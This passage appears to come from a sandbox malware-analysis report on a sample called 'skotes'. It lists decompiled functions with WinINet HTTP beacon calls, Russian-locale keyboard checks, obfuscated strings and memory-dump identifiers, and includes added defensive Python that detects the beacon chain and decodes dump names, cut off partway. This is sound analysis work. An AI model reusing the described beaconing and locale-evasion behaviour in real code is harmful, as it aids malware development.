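    "HttpSendRequestA.WININET(?,00000000), ref: 00E9BFF6",
    "InternetReadFile.WININET(?,?,000003FF,?), ref: 00E9C0A8",
    "InternetCloseHandle.WININET(?), ref: 00E9C187",
    "InternetCloseHandle.WININET(?), ref: 00E9C18F",
    "InternetCloseHandle.WININET(?), ref: 00E9C197",
]

if __name__ == "__main__":
    print(find_wininet_beacon(REPORT_TRACE))
```

                                  Running it on the report's trace yields port 80, service HTTP, a 1500 ms sleep before the chain, 1023-byte reads and three handle closes; dropping any one step from the chain makes the matcher return None, so the check fails closed rather than flagging partial WinINet use such as a single InternetOpen.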

                                  Control-flow Graph
                                  (Basic-block graph of the function at 00E965E0, drawn interactively in the original report with executed and not-executed blocks colored differently; the block and edge list is omitted here. Subcalls in the graph: 04AD0740, 00EA7A00, 00E95C10, 00E922C0, 00EAD663, 00EC6C6A, 00EA80C0 (twice), 00EACFF1. API call in the graph: LookupAccountNameA.)
                                  APIs
                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E96680
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_6_2_e90000_skotes.jbxd): same as listed for the 00E9BE30 function above
                                  Similarity
                                  • API ID: AccountLookupName
                                  • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                  • API String ID: 1484870144-2309319047
                                  • Opcode ID: e1f45e3c587b95e239b96afae33116739a41bf30302c7b5fb5e710b5284c179a
                                  • Instruction ID: ef81d5b9d8aeb3b2a8655731b57d6bbf706259122ec79db2eb734c75b84193da
                                  • Opcode Fuzzy Hash: e1f45e3c587b95e239b96afae33116739a41bf30302c7b5fb5e710b5284c179a
                                  • Instruction Fuzzy Hash: E491D3B19001189BDF28DB28CC85BEDB7B9EB45304F4055EEE519A7282DB319BC4CFA4
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                    • Part of subcall function 00E9BE30: Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                    • Part of subcall function 00E9BE30: InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                    • Part of subcall function 00E9BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                    • Part of subcall function 00E9BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA4F92
                                  • Sleep.KERNELBASE ref: 00EA6CF5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_6_2_e90000_skotes.jbxd): same as listed for the 00E9BE30 function above
                                  Similarity
                                  • API ID: InternetOpenSleep$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                  • API String ID: 3927735766-4005516279
                                  • Opcode ID: 8c57455988c6055b738784879978c7b70a98dc553721b3effc0b8a3063ecd92e
                                  • Instruction ID: 346b5585f618436689d31cad824162e35307c707fdd7ce62116f5602813ae456
                                  • Opcode Fuzzy Hash: 8c57455988c6055b738784879978c7b70a98dc553721b3effc0b8a3063ecd92e
                                  • Instruction Fuzzy Hash: DC233771A001488BEB19DB28CD8979DBBB6DF8B304F5491D8E049BB2C2DB756B84CF51
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                    • Part of subcall function 00E9BE30: Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                    • Part of subcall function 00E9BE30: InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                    • Part of subcall function 00E9BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                    • Part of subcall function 00E9BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA4F92
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_6_2_e90000_skotes.jbxd): same as listed for the 00E9BE30 function above
                                  Similarity
                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range$a$a
                                  • API String ID: 4201286991-1933972915
                                  • Opcode ID: c1e9eb7ea3516045da1162a6d54d800b40dedae2b91c6da898b0966332b745be
                                  • Instruction ID: 872b6786c1670bb4e9fc1f4f29d3b21b98b712c5cb9e9a49b7d720437c77cce8
                                  • Opcode Fuzzy Hash: c1e9eb7ea3516045da1162a6d54d800b40dedae2b91c6da898b0966332b745be
                                  • Instruction Fuzzy Hash: 05232571A002588BDB19DB28CD8979DBBB6DB8B304F5491D8E049BB2C2DB356F84CF51

                                  Control-flow Graph
                                  (Basic-block graph of the function at 00E97D30, drawn interactively in the original report with executed and not-executed blocks colored differently; the block and edge list is omitted here. Subcalls in the graph: 00EC40F0, 00EACFF1, 00EA7A00, 00E95C10, 00EAD663, 00EC6C6A, 00E95D50, 00E95730, 00EC8BBE; the block 00E98019-00E982BD repeats the 00EA7A00 / 00E95C10 / 00E95D50 / 00E95730 call sequence four times. API call in the graph: GetNativeSystemInfo at 00E97ED3.)
                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E97ED3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$pa$P
                                  • API String ID: 1721193555-4060848844
                                  • Opcode ID: 9c00b568f1439046334da9affe463195210ef07af467a6c94bac0c363bb3d2b3
                                  • Instruction ID: b1a1b1dfa2591c3efa1493cca83d0f25254a9b0cd39ff0c2193982d86bd06d77
                                  • Opcode Fuzzy Hash: 9c00b568f1439046334da9affe463195210ef07af467a6c94bac0c363bb3d2b3
                                  • Instruction Fuzzy Hash: 30E12771E04244ABDF15FB28CD073AE7BA1AB86724F94128CE4157B3D2DB758E8587C2

                                  Control-flow Graph

                                  [Control-flow graph: function starting at e95ee0, basic blocks e95ee0-e965df, calling RegOpenKeyExA at e96016 and RegEnumValueA at e96243]
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                  • API String ID: 0-3963862150
                                  • Opcode ID: 9cca0abaff2fe43a74626ede54bab3e6b190f06ff143b577793048713e3cc2ec
                                  • Instruction ID: b2505d21f0583024adc77c9fd62aa9e96bb8a75a844a07bcfdcaac746388dd67
                                  • Opcode Fuzzy Hash: 9cca0abaff2fe43a74626ede54bab3e6b190f06ff143b577793048713e3cc2ec
                                  • Instruction Fuzzy Hash: 8FD1CE719002589BEF24DF24CC84BDEB7B9EB05304F5042D9E509FB291DB74AAA88F94

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: a$a
                                  • API String ID: 3472027048-2001862489
                                  • Opcode ID: 4672fecd189e4700ac39ba238f3cddaaa4b3a7087ce02655a0cbc8c6bf53b1b0
                                  • Instruction ID: ebfb8f5f31c1c16592680a4d595e2f88f554527130982fff67271b73fde58fe2
                                  • Opcode Fuzzy Hash: 4672fecd189e4700ac39ba238f3cddaaa4b3a7087ce02655a0cbc8c6bf53b1b0
                                  • Instruction Fuzzy Hash: 5DF0D671A00644ABC601BB798C0271EBBB4EB4B760F841658E8217B2D1DB702A0587D2

                                  Control-flow Graph

                                  [Control-flow graph: function starting at e98380, basic blocks e98380-e98571, calling GetNativeSystemInfo at e98524]
                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 00E98524
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID: pa
                                  • API String ID: 1721193555-338722474
                                  • Opcode ID: 1f0f571569ce32568e9804870f539b050a6317cb7a26a78e71ff8890a97b39f6
                                  • Instruction ID: 7c0fbd5ee095a01eae1afeb06ee37509ad5f93852e457a8569107157c4e418c5
                                  • Opcode Fuzzy Hash: 1f0f571569ce32568e9804870f539b050a6317cb7a26a78e71ff8890a97b39f6
                                  • Instruction Fuzzy Hash: 4F512571D042089BEF28EB78CE45BDEB7B4DF46314F505298E815B7291DF319E848B91

                                  Control-flow Graph

                                  [Control-flow graph: function starting at 4ad0740, single basic block 4ad0740-4ad07a0]
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2960317464.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4ad0000_skotes.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec9994e0a7386bb576dfb4f9caf14f87a1220d07d2b55b2eeb249f89290d3a6a
                                  • Instruction ID: 613f4ad26a91a1f6cc82635cc65b8ff96333b7908f294e3fd627db53ffa6005b
                                  • Opcode Fuzzy Hash: ec9994e0a7386bb576dfb4f9caf14f87a1220d07d2b55b2eeb249f89290d3a6a
                                  • Instruction Fuzzy Hash: 23E0B6FB68C150BD714290823B089F6AB7EE4D36757318477F403C5846F6C51A0D7531
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA08B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                  • String ID: mxo1L0x$"$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$GnNoc2Hc$L1$MGE+$MQ==$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                  • API String ID: 4234742559-3200787904
                                  • Opcode ID: bb516110aadf0d18ba50897e2cde74f28f568a52c95bf409f2a7610301b086ac
                                  • Instruction ID: c410571701879ff9db6717c47e559e1a9fe575b255b61e949f7761a1c203ff8e
                                  • Opcode Fuzzy Hash: bb516110aadf0d18ba50897e2cde74f28f568a52c95bf409f2a7610301b086ac
                                  • Instruction Fuzzy Hash: 2E231C71A001449BEF1CDB38CD8979DBBB2EF86304F149198E449FB3D6DB359A848B91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 85f288da413e20062a65cede5f448619aec9e7cde497f207dff23ba4d4b59b7d
                                  • Instruction ID: 0ddf8b8eefd371eea50fc9b2fc4e7561c4f22229fd75c71e5cb305a74e4fbd95
                                  • Opcode Fuzzy Hash: 85f288da413e20062a65cede5f448619aec9e7cde497f207dff23ba4d4b59b7d
                                  • Instruction Fuzzy Hash: E2C217B1E046288FDB25CE28DD407EAB7B5EB58305F1451ABD84DB7380E775AE828F41
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                  • Instruction ID: 2631b5e52f9840f1b0d146687bbc99a8c16c5432f6b24132434e0e7a49b2fcf2
                                  • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                  • Instruction Fuzzy Hash: F8F12C71E012199BDF14CFA8C8806ADB7B1FF58314F25826ED919BB385D731AE02CB90
                                  APIs
                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EACF52,?,?,?,?,00EACF87,?,?,?,?,?,?,00EAC4FD,?,00000001), ref: 00EACC03
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$FilePreciseSystem
                                  • String ID:
                                  • API String ID: 1802150274-0
                                  • Opcode ID: aa42f19425f6babeac861acb3862874d6301d9a0a66e438ed2af787a76a30a64
                                  • Instruction ID: 67fce372397d63be527cdef2ae98958bc4304ccf52271fb4671c7d080158b5d5
                                  • Opcode Fuzzy Hash: aa42f19425f6babeac861acb3862874d6301d9a0a66e438ed2af787a76a30a64
                                  • Instruction Fuzzy Hash: 74D022325021389B8A113B85EC008ADFB88CB8EB683031012FA083F220CA507C80CBD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                  • Instruction ID: 70972ef803b1c898ff52d8d4535f77c2b53e9d13d0d9d29b6513f29eff58f4e7
                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                  • Instruction Fuzzy Hash: 8D514F3070878856EB3846284BD6FFE67D6AB52308F14351DE4C2F7292CE639D4BC651
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0e036ef4a713a00d93a3ef42d041e042379b87057a5696ba33ad2071ff4048a
                                  • Instruction ID: ed5d70144a18e2f7271b33ee09e5a95d615a71c64f54e9f68974fb15528f9ba8
                                  • Opcode Fuzzy Hash: d0e036ef4a713a00d93a3ef42d041e042379b87057a5696ba33ad2071ff4048a
                                  • Instruction Fuzzy Hash: 842260B3F515144BDB0CCB9DDCA27ECB2E3AFD8218B0E903DA40AE3345EA79D9158644
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae59dd5ba2c14c3a1103299f7a0bfa5cca40965c91aee7766a7fda79aca92ae5
                                  • Instruction ID: 208b0c57f86b66a7a1aa69d69f3c2ff34cd0f0ee73bb74300c7c1fe86f13191f
                                  • Opcode Fuzzy Hash: ae59dd5ba2c14c3a1103299f7a0bfa5cca40965c91aee7766a7fda79aca92ae5
                                  • Instruction Fuzzy Hash: 1EB15A71614604CFD718CF28C486BA57BA0FF45368F259659E8D9DF3A1D335E982CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46b04ec41cc4f0b4dd8c16c9c1800e2e2cfd7180c07b47fc686bb78de104e0c8
                                  • Instruction ID: ddad01e5e489ba2bcfc86a8ec97a9e43fa0f63a26416a5a81d3ff37f9e181054
                                  • Opcode Fuzzy Hash: 46b04ec41cc4f0b4dd8c16c9c1800e2e2cfd7180c07b47fc686bb78de104e0c8
                                  • Instruction Fuzzy Hash: BD81FBB4A012458FEB15CF69D890BEEFBF1FB5A304F141269D950B7392C331994ACBA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E924BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 3723451e908b1dcc61f768f214726208bc0e9ae7959b2116d70a57890a94c835
                                  • Instruction ID: bdf0481a8ec5eca73125f7957cd13db729ce7f529667a01d53362572e75fd8b7
                                  • Opcode Fuzzy Hash: 3723451e908b1dcc61f768f214726208bc0e9ae7959b2116d70a57890a94c835
                                  • Instruction Fuzzy Hash: 3B51DEB2E046069FDB15CF59DC817AAB7F0FB98318F24856AD506FF690D730A944CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d0252e9aeb661f4215443df75a30aaef9b35ee874e6079b27735c2d6c7ca350
                                  • Instruction ID: 3fbadc2c74657ed7bdd474fe1424507d0f68e48454515d5d0cdd47adfa2b6239
                                  • Opcode Fuzzy Hash: 0d0252e9aeb661f4215443df75a30aaef9b35ee874e6079b27735c2d6c7ca350
                                  • Instruction Fuzzy Hash: 4121B673F208394B770CC57E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8208cdfbb9935377fba52fcef031a92135a40846ae0fc56bc3f0d9b9ca180fd
                                  • Instruction ID: 9bdc67d3407102a3bcd27ccb8cdc52dc72d83ba74735a9b04f7479f62893b00e
                                  • Opcode Fuzzy Hash: b8208cdfbb9935377fba52fcef031a92135a40846ae0fc56bc3f0d9b9ca180fd
                                  • Instruction Fuzzy Hash: 70117323F30C256A675C816D8C172BAA5D2EBD825071F533AD826E7384E9A4DE23D290
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 1d3c82582386a44715c853ee2bdac9d21cc47ac9bbc22bfde5f4ee5dfddaae2d
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: 6B112B7F60018243E60C862DCAB45B7E795EBC53297ED637BD0827B758DA22E947B600
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 527fb345d153c74316b1e162b4f5f74f073da68e101651118a59bd16bd25978c
                                  • Instruction ID: 2c51b22e9e683ce4a9dfa63bbd31e3360e7daa75a2ca5b7c692f18a8c7c7a0d0
                                  • Opcode Fuzzy Hash: 527fb345d153c74316b1e162b4f5f74f073da68e101651118a59bd16bd25978c
                                  • Instruction Fuzzy Hash: 39E086340401486FCF257B18CA19E8F3BD9EB5174DF141C18FD145A221CB26ED52C680
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                  • Instruction ID: e932c59ef1be3749eabb0148cdb8fb42ffd00445632554958e30ba7a29f01519
                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                  • Instruction Fuzzy Hash: B2E04632921268EBCB14DB9C8A05E8AB2ECEB49B04B6911AAB501E3151C271DE01C7D0
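                                  The dump identifiers in the records above pack several facts into one file name: a process index, the base address of the dumped region (it matches the Offset shown for each dump), a value that coincides with the Win32 PAGE_* protection constants (0x40, 0x04, 0x08, 0x80 on this page) and a value equal to MEM_IMAGE. The report does not spell this out. The Python below is an added example, not part of the Joe Sandbox report or its tooling; it assumes the field layout given in its comments (inferred from the names on this page; fields 3, 6 and 8 are kept raw rather than guessed) and decodes the protection and region type with the documented winnt.h constants, so an analyst can see at a glance which dumped regions of the image were both writable and executable, which is where self-modifying or unpacked code lives. The sample identifiers are copied from the records above.

```python
import re
from dataclasses import dataclass

# Win32 page-protection and region-type constants from winnt.h. The values are
# documented; the assumption is only that the .sdmp name fields carry them.
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIER = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Assumed layout <f1>.<f2>.<f3>.<base>.<protect>.<f6>.<type>.<f8>.sdmp, inferred from
# this report: f1 looks like the process index, field 4 equals the dump "Offset",
# field 5 matches PAGE_* values and field 7 equals MEM_IMAGE on every dump here.
# Fields 2, 3, 6 and 8 are not decoded.
SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Dump:
    process_index: int
    field2: int
    field3: str
    base: int
    protect: int
    field6: int
    mem_type: int
    field8: int


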